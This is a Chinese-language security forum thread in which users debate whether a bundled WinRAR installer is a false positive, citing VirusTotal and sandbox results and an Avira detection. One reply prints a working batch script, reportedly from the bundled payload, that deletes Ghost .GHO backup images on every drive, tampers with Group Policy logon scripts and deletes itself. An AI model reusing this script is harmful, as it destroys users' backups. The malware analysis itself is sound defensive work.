帖子在卡巴区，大家看下

来看那看那是不是卡巴的误报
http://bbs.kafan.cn/forum.php?mo ... &fromuid=374700

瓜皮猫

多引擎扫描
http://www.virustotal.com/file-s ... 6dd071cc-1286789874

jayavira

应该不是误报的，的确有可疑行为

http://camas.comodo.com/cgi-bin/submit?file=bdd287b4083ee1133f22eceabc4097a81ea7312af5baeb6a32ee5c2b6dd071cc


另外VT上也有7款杀软报警呢

http://www.virustotal.com/file-s ... 6dd071cc-1286789598

恋亿晓

为什么我这里avast!没有报警呢？
to avast!

瓜皮猫

jayavira 发表于 2010.10.11 17:40
应该不是误报的，的确有可疑行为

http://camas.comodo.com/cgi-bin/submit?file=bdd287b4083ee1133f22ec ...

我比你晚上传4分钟，然后少了2款报

jayavira

回复 5楼 三生缘石 的帖子

难道在线沙盘又误判了

幸福的猪猪

不是误报。这个安装程序捆绑了其他的程序（或者文件）。

金山毒霸论坛上有一些捆绑文件相关文件代码。（

（http://bbs.duba.net/thread-22315402-1-1.html）


以下为其中包含（或者是从网络下载的）一个删除本地磁盘GHO镜像文件的批处理。）

1. @Echo Off
   
2. Del /f/s/q %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\sys.bat
   
3. :Next
   
4. %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\shijian.vbs
   
5. :Next
   
6. rename %SystemRoot%\system32\GroupPolicy\User\Scripts\Logon\ssys.bat sys.bat
   
7. :Next
   
8. For %%a In (c d e f g h i j k l m n o p q r s t u v w x y z)Do (
   
9. For /f "delims=" %%b In ('dir /a/b/s "%%a:\*.GHO"')do (
   
10. Del /f/s/q/a "%%~dpb\*.GHO"
    
11. ))
    
12. :Next
    
13. Del /f/s/q d:\*.GHO
    
14. Del /f/s/q e:\*.GHO
    
15. Del /f/s/q f:\*.GHO
    
16. Del /f/s/q g:\*.GHO
    
17. Del /f/s/q h:\*.GHO
    
18. Del /f/s/q i:\*.GHO
    
19. Del /f/s/q j:\*.GHO
    
20. Del /f/s/q k:\*.GHO
    
21. Del /f/s/q %SystemRoot%\Logon\sys.bat
    
22. Del /f/s/q %SystemRoot%\Logon\shijian.vbs
    
23. Del /f/s/q %SystemRoot%\Logon\index.vbs
    
24. rd 2 /s/q %SystemRoot%\GroupPolicy
    
25. Del /f/s/q %SystemRoot%\system32\GroupPolicy\33.vbs
    
26. Del /f/s/q %SystemRoot%\system32\GroupPolicy\2.bat
    
27. dEL %0
    

复制代码

瓜皮猫

回复 6楼 jayavira 的帖子

不是在线沙盘啦，一是VT

rasis

我们收到了以下存档文件:

文件 ID          文件名         大小(字节)         结果
25913728          wrar393sc.7z         1.91 MB         OK

以下位置提供了存档中包含的文件及其结果的列表:
文件 ID          文件名         大小(字节)         结果
25913624          wrar393sc.exe          2 MB          MALWARE


下面提供了与每个样本相关的详细报告:
文件名         结果
wrar393sc.exe          MALWARE

已确定“wrar393sc.exe”文件是“MALWARE”。 我们的分析人员将这种威胁命名为“DR/Agent.EF”。 术语“DR/”指的是能够将病毒或恶意软件散布到系统中的程序。通过接下来的某次更新，我们的病毒定义文件(VDF)中将添加这项检测。

jayavira

回复 8楼 三生缘石 的帖子

我知道的
难道是因为误报，所以VT才会减少报警数量
不过，也不可能啊，才4分钟而已，解决误报也没有那么快的